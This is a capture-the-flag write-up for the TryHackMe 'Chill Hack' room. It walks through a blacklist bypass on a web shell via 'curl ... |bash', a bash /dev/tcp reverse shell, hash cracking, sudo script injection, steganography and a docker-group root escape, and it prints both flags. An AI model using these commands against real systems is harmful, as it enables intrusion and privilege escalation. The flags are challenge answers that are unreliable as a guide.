Chill Hack
Platform: TryHackMe
URL: https://tryhackme.com/room/chillhack
Initial scans
We first do a nmap scan
sudo nmap -sV -sC -oN nmap/initital -v 10.10.45.110
We find 3 ports, 21, 22 and 80.
Logging in to the FTP with anonymous we find one file note.txt
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
gobuster of site gives us a βsecretβ folder which contains a webshell with a few limitations
kali@kali:~/thm/chill_hack$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://10.10.223.59
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.223.59
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/02/22 16:22:20 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/secret (Status: 301)
/server-status (Status: 403)
[ERROR] 2021/02/22 16:25:07 [!] parse http://10.10.223.59/error_log: net/url: invalid control character in URL
Progress: 49365 / 56164 (87.89%)
===============================================================
2021/02/22 16:29:53 Finished
===============================================================
Web shell
Some key words are being filtered, like bash, ls, sh, php, perl, etc.. So we need to try to get past that some how.
With the help of the note.txt info we try different things on the βwebshellβ
In the end we manage to read out the index.php file, so we can peak into how the commands are being filtered
command=cmd='cat index.php'; $cmd
index.php
<form method="POST">
<input id="comm" type="text" name="command" placeholder="Command">
<button>Execute</button>
</form>
<?php
if(isset($_POST['command']))
{
$cmd = $_POST['command'];
$store = explode(" ",$cmd);
$blacklist = array('nc', 'python', 'bash','php','perl','rm','cat','head','tail','python3','more','less','sh','ls');
for($i=0; $i<count($store); $i++)
{
for($j=0; $j<count($blacklist); $j++)
{
if($store[$i] == $blacklist[$j])
{
?>
<h1 style="color:red;">Are you a hacker?</h1>
<style>
body
{
background-image: url('images/FailingMiserableEwe-size_restricted.gif');
background-position: center center;
background-repeat: no-repeat;
background-attachment: fixed;
background-size: cover;
}
</style>
<?php
return;
}
}
}
?>
<h2 style="color:blue;"><?php echo shell_exec($cmd);?></h2>
<style>
body
{
background-image: url('images/blue_boy_typing_nothought.gif');
background-position: center center;
background-repeat: no-repeat;
background-attachment: fixed;
background-size: cover;
}
</style>
<?php
}
?>Reverse shell
So we see here that the command post variable is exploded on space/whitespace and checked against the array of strings.
It has to match exactly tho, so we can get around this!
command=curl 10.9.165.12:8000/shell |bash for example wonβt match the check, since the explosion happens on space, the 3 items here will be:
curl10.9.165.12:8000/shell|bash
None of these are in the list, bash is, but it has to be an exact match, which it isnβt.
shell contains a simple bash /dev/tcp reverse shell.
kali@kali:~/thm/chill_hack$ cd www/
kali@kali:~/thm/chill_hack/www$ cat shell
bash -i >& /dev/tcp/10.9.165.12/9000 0>&1
And we host it up with python3 -m http.server
And boom! We have a shell on the box!
kali@kali:~/thm/chill_hack$ nc -lvnp 9000
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 10.10.45.110.
Ncat: Connection from 10.10.45.110:34864.
bash: cannot set terminal process group (1064): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/secret$ whoami
whoami
www-data
www-data@ubuntu:/var/www/html/secret$
Letβs stabalize the shell a bit:
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali
$ stty raw -echo
$ fg (enter twice)
# In reverse shell
export TERM=xterm
# If you need to change column and row count
stty rows <num> columns <cols>Files and SQL dump.
We quickly find some more files. Which also contains some db credentials.
$con = new PDO("mysql:dbname=webportal;host=localhost","root","!@m+her00+@db");
And there is a user table here, hopefully one of these password hashes can be cracked.
mysql> use webportal
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from users
-> ;
+----+-----------+----------+-----------+----------------------------------+
| id | firstname | lastname | username | password |
+----+-----------+----------+-----------+----------------------------------+
| 1 | Anurodh | Acharya | Aurick | 7e53614ced3640d5de23f111806cc4fd |
| 2 | Apaar | Dahal | cullapaar | 686216240e5af30df0501e53c789a649 |
+----+-----------+----------+-----------+----------------------------------+
2 rows in set (0.00 sec)Crackstation to the rescue!
anurodh 7e53614ced3640d5de23f111806cc4fd md5 masterpassword
apaar 686216240e5af30df0501e53c789a649 md5 dontaskdonttell
Letβs try to ssh in with these!
Nothing worked :/
Getting local user
Running linpeas we get a few more things to try.
Like there is a file we can run as the user apaar, .helpline.sh
And checking out the file, we see that we can inject commands here!
www-data@ubuntu:/home/apaar$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
www-data@ubuntu:/home/apaar$ sudo -u apaar .helpline.sh
[sudo] password for www-data:
^Csudo: 1 incorrect password attempt
www-data@ubuntu:/home/apaar$ sudo -u apaar ./.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
Enter the person whom you want to talk with: plzsub
Hello user! I am plzsub, Please enter your message: /bin/bash
whoami
apaar
And now we got a βpermanentβ foothold, since we can inject our own ssh key to authorized_keys and log directly in!
User flag
We can now get the first flag. woop woop!
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
Getting root user
Letβs run Linpeas again as apaar, and see what it tells us. Nothing new.
After a lot of messing around I get back to the βotherβ website which is running locally only.
We got the files in /var/www/files and checking out the apache config, we see it running on port 9001 which also linpeas mentions.
These are the same files that the MySQL creds was found in.
Checking out the code a bit more we see some images displayed when successfully loged in with a message Look in the dark! You will find your answer.
Letβs see if the images has something hidden.
kali@kali:~/thm/chill_hack$ steghide extract -sf hacker-with-laptop_23-2147985341.jpg
Enter passphrase:
wrote extracted data to "backup.zip".
And yes, there is a backup.zip hidden in there. The zip is password protected, to letβs ask john if he knows the password.
kali@kali:~/thm/chill_hack$ zip2john backup.zip > backup.zip.hashes
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: 2b chk, TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3
kali@kali:~/thm/chill_hack$ john backup.zip.hashes --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word (backup.zip/source_code.php)
1g 0:00:00:00 DONE (2021-02-23 16:39) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s total90..cocoliso
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Unzip it!
kali@kali:~/thm/chill_hack$ unzip backup.zip
Archive: backup.zip
[backup.zip] source_code.php password:
inflating: source_code.php
kali@kali:~/thm/chill_hack$ less source_code.php
We see a hardcoded password here, base64 encoded.
kali@kali:~/thm/chill_hack$ echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d
!d0ntKn0wmYp@ssw0rdkali@kali:~/thm/chill_hack$ echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d | echo ""
kali@kali:~/thm/chill_hack$ echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d ; echo ""
!d0ntKn0wmYp@ssw0rd
It also contains this message when the user has logged in successfully: echo "Welcome Anurodh!";
Thatβs a user on the box too! Letβs see if he reuses passwords shall we?
apaar@ubuntu:~$ su anurodh
Password:
anurodh@ubuntu:/home/apaar$
Weβre in!
From all our linpeas checking earlier on we know that the anurodh user is a member of the docker group.
So it should be as easy as one line of commands and we got root.
Check out GTFOBins https://gtfobins.github.io/gtfobins/docker/#shell for more docker fun :)
anurodh@ubuntu:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# cd /root
# ls
proof.txt
# cat proof.txt
{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}
Congratulations! You have successfully completed the challenge.
,-.-. ,----. _,.---._ .-._ ,----.
,-..-.-./ \==\ ,-.--` , \ _.-. _.-. _,..---._ ,-.' , - `. /==/ \ .-._ ,-.--` , \
|, \=/\=|- |==||==|- _.-` .-,.'| .-,.'| /==/, - \ /==/_, , - \|==|, \/ /, /==|- _.-`
|- |/ |/ , /==/|==| `.-.|==|, | |==|, | |==| _ _\==| .=. |==|- \| ||==| `.-.
\, , _|==/==/_ , /|==|- | |==|- | |==| .=. |==|_ : ;=: - |==| , | -/==/_ , /
| - - , |==|==| .-' |==|, | |==|, | |==|,| | -|==| , '=' |==| - _ |==| .-'
\ , - /==/|==|_ ,`-._|==|- `-._|==|- `-._ |==| '=' /\==\ - ,_ /|==| /\ , |==|_ ,`-._
|- /\ /==/ /==/ , //==/ - , ,/==/ - , ,/ |==|-, _`/ '.='. - .' /==/, | |- /==/ , /
`--` `--` `--`-----`` `--`-----'`--`-----' `-.`.____.' `--`--'' `--`./ `--`--`-----``
--------------------------------------------Designed By -------------------------------------------------------
| Anurodh Acharya |
---------------------
Let me know if you liked it.
Twitter
- @acharya_anurodh
Linkedin
- www.linkedin.com/in/anurodh-acharya-b1937116a
Root flag
{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}